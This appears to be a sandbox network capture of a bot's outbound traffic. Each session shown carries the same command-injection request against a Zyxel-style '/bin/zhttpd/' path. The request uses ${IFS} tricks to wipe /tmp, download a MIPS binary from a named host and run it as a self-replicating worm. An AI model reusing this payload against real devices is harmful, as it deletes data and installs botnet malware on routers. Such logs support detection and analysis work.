                                        Mar 31, 2024 09:22:19.590907097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7690192.168.2.2339596189.129.115.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.590982914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7691192.168.2.2345044108.66.95.213443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.591042042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7692192.168.2.234624499.35.162.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.591092110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7693192.168.2.234365094.233.228.251443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.591182947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7694192.168.2.233989298.219.117.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.591239929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7695192.168.2.2349664100.236.228.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.591310978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7696192.168.2.2342710185.141.138.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.591350079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7697192.168.2.234416680.24.32.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.591454983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7698192.168.2.2332936114.191.185.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.591510057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7699192.168.2.235525893.160.86.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.591583014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7700192.168.2.2343540114.15.100.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.591665030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7701192.168.2.2347504104.14.176.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.591730118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7702192.168.2.2354730148.152.14.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.591792107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7703192.168.2.235312866.77.211.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.591871023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7704192.168.2.2335904114.22.124.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.591921091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7705192.168.2.2345124166.108.108.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.591981888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7706192.168.2.2346298212.195.8.13443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.592039108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7707192.168.2.2349046116.175.82.130443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.592116117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7708192.168.2.234320827.176.226.149443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.592190027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7709192.168.2.2333372121.64.95.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.592271090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7710192.168.2.233737696.229.72.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.592324018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7711192.168.2.2336994167.55.59.164443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.592394114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7712192.168.2.235982861.167.245.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.592459917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7713192.168.2.233772671.113.173.251443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.592525959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7714192.168.2.2341276178.200.168.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.592588902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7715192.168.2.2358454125.119.57.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.592653990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7716192.168.2.235090851.219.206.129443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.592715025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7717192.168.2.2360688187.185.31.170443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.592784882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7718192.168.2.2351910162.254.171.221443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.592840910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7719192.168.2.234221019.215.42.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.592931986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7720192.168.2.235451491.41.182.110443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.592972994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7721192.168.2.2349380117.34.237.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.593055964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7722192.168.2.2351380155.47.145.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.593106031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7723192.168.2.2352898171.117.180.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.593189955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7724192.168.2.2354664193.223.76.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.593278885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7725192.168.2.235462646.35.151.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.593326092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7726192.168.2.2332912169.239.195.164443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.593394995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7727192.168.2.2357932138.116.51.105443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.593487978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7728192.168.2.2348870126.84.14.170443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.593544006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7729192.168.2.2356956104.57.147.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.593641043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7730192.168.2.2353254201.186.152.116443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.593723059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7731192.168.2.2345410121.27.87.91443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.593785048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7732192.168.2.2333990197.111.38.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.593849897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7733192.168.2.2351420153.155.203.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.593916893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7734192.168.2.234960424.83.216.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.593976974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7735192.168.2.2349058117.255.136.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.594062090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7736192.168.2.234853493.193.99.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.594114065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7737192.168.2.234908034.200.134.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.594201088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7738192.168.2.2355666202.227.216.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.594268084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7739192.168.2.2347510193.76.50.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.594336033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7740192.168.2.2338144159.13.144.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.594398022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7741192.168.2.2347194199.130.82.33443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.594461918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7742192.168.2.233823019.60.145.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.594538927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7743192.168.2.234521250.215.22.130443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.594594955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7744192.168.2.2350532203.216.187.34443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.594647884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7745192.168.2.2351248104.28.180.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.594737053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7746192.168.2.234320695.110.183.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.594788074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7747192.168.2.2336394188.253.168.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.594872952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7748192.168.2.2358144220.224.233.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.594952106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7749192.168.2.2358254129.4.192.224443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.594995975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7750192.168.2.2355048115.228.0.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.595067978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7751192.168.2.23346904.227.214.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.595143080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7752192.168.2.234157434.139.114.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.595180988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7753192.168.2.2356586100.22.130.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.595231056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7754192.168.2.234620020.228.143.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.595293045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7755192.168.2.23436348.230.68.123443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.595379114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7756192.168.2.23483341.50.21.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:19.595432997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7757192.168.2.2353388108.253.170.84443
                                        TimestampBytes transferredDirectionData
